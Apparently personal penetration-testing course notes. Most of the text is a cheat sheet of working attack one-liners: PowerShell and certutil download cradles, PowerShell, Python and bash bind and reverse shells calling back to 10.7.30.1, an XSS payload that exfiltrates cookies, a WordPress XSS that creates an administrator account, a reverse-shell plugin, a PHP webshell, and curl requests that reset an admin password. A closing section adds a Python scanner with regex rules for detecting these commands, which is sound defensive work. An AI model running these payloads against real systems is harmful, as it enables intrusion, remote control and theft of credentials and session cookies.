# Note Day1,2

## windows download file

```
certutil.exe -urlcache -f http://10.7.30.1/test.txt test.txt
```

```
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.7.30.1/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
```

Remote download and execute, the file never touches disk:

```
IEX (New-Object System.Net.Webclient).DownloadString('http://10.7.30.1:8081/powercat.ps1');
```

bindshell

```
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
```

reverseshell

```
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.7.30.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()"
```

mkpsrevshell.py

```
https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py
```

```
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://10.7.30.1:8081/powercat.ps1');powercat -c 10.7.30.1 -p 4444 -e powershell"
```

## Linux

python bind shell (the `while` loop must start on its own line inside the triple-quoted string, otherwise Python rejects it as a syntax error)

```
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR,1);s1.bind(("0.0.0.0",4444));s1.listen(1);c,a=s1.accept()
while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
```

bash reverse shell

```
/bin/bash -c 'bash -i >& /dev/tcp/10.7.30.1/4444 0>&1'
```

TTY shell

```
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ script -qc /bin/bash /dev/null
```

php reverse shell

```
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
```

XSS

```
email=<script>new Image().src="http://10.7.30.1/cool.jpg?output="%2bdocument.cookie;</script>
```

wordpress xss

```
var ajaxRequest = new XMLHttpRequest();
var requestURL = "/wp-admin/user-new.php";
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
var nonce = nonceMatch[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2=attackerpass&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);
```

encode xss

```
function encode_to_javascript(string) {
    var input = string;
    var output = '';
    for (let pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if (pos != (input.length - 1)) {
            output += ",";
        }
    }
    return output;
}

let encoded = encode_to_javascript('insert_minified_javascript');
console.log(encoded);
```

wordpress plugin https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell

```
<?php
/**
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI:
 * Description: Reverse Shell Plugin
 * Version: 1.0
 * Author: Vince Matteo
 * Author URI: http://www.sevenlayers.com
 */
exec("windows/linux command");
?>
```

php webshell

```php
<?php echo system($_GET['cmd']); ?>
```

API requests with curl (the option dashes must be plain ASCII hyphens, otherwise curl treats `–H` and `–d` as URLs):

```
curl -X PUT -i http://10.7.30.27:3002/users/v1/admin/password -H "Content-Type: application/json" -d "{\"password\":\"123\"}"
```

```
curl -X POST -i http://10.7.30.27:3002/users/v1/register -H "Content-Type: application/json" -d "{\"username\":\"test\",\"password\": \"password\", \"email\":\"test@mail.com\"}"
```

```
curl -X POST -i http://10.7.30.27:3002/users/v1/login -H "Content-Type: application/json" -d "{\"username\":\"test\",\"password\": \"password\"}"
```
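Added here as a defender-side example, not part of the original notes: a small Python scanner that flags process command lines matching the download cradles and shell one-liners catalogued above (certutil `-urlcache`, `WebClient.DownloadFile`, the `IEX ... DownloadString` cradle, the PowerShell TCP bind/reverse shell, and the bash `/dev/tcp` reverse shell). The rule names, the regexes, and the sample command lines are my own constructions, written against the exact strings that appear in these notes; the same patterns would normally be matched against Sysmon event 1 or auditd `execve` telemetry.

```python
import re

# Detection rules keyed by a short name. The regexes are my own (assumption),
# compiled case-insensitively because cmd.exe and PowerShell ignore case and
# the command lines above mix "Webclient" / "WebClient", "iex" / "IEX".
DETECTION_RULES = {
    "certutil_urlcache_download": re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I),
    "webclient_downloadfile": re.compile(r"Net\.WebClient\)?\.DownloadFile\(", re.I),
    "iex_downloadstring_cradle": re.compile(r"(IEX|Invoke-Expression).*DownloadString\(", re.I),
    "powershell_tcp_shell": re.compile(r"System\.Net\.Sockets\.Tcp(Listener|Client).*\biex\b", re.I | re.S),
    "bash_dev_tcp_reverse_shell": re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
}


def classify_command(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line, in rule order."""
    return [name for name, rx in DETECTION_RULES.items() if rx.search(cmdline)]


def scan_log(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Run all rules over each line; keep (line_no, cmdline, hits) for lines with a hit."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        hits = classify_command(line)
        if hits:
            findings.append((line_no, line, hits))
    return findings


# Constructed sample of process command lines (not real telemetry). The first
# three mirror commands from the notes above; the last two are benign
# administrator activity that a naive "certutil" or "powershell" match would
# wrongly flag.
SAMPLE_CMDLINES = [
    "certutil.exe -urlcache -f http://10.7.30.1/test.txt test.txt",
    "powershell -c \"IEX (New-Object System.Net.Webclient).DownloadString('http://10.7.30.1:8081/powercat.ps1')\"",
    "/bin/bash -c 'bash -i >& /dev/tcp/10.7.30.1/4444 0>&1'",
    "certutil.exe -verify signed.cab",
    "powershell -c \"Get-ChildItem C:\\Users | Measure-Object\"",
]

if __name__ == "__main__":
    for line_no, cmd, hits in scan_log(SAMPLE_CMDLINES):
        print(f"line {line_no}: {', '.join(hits)} :: {cmd}")
```

The rules key on the verbs that matter (`-urlcache`, `DownloadString(`, `/dev/tcp/`) rather than on the binary name alone, which is why `certutil -verify` and a plain `Get-ChildItem` produce no hit; in a real pipeline they would be paired with parent-process and network-connection context to cut noise further.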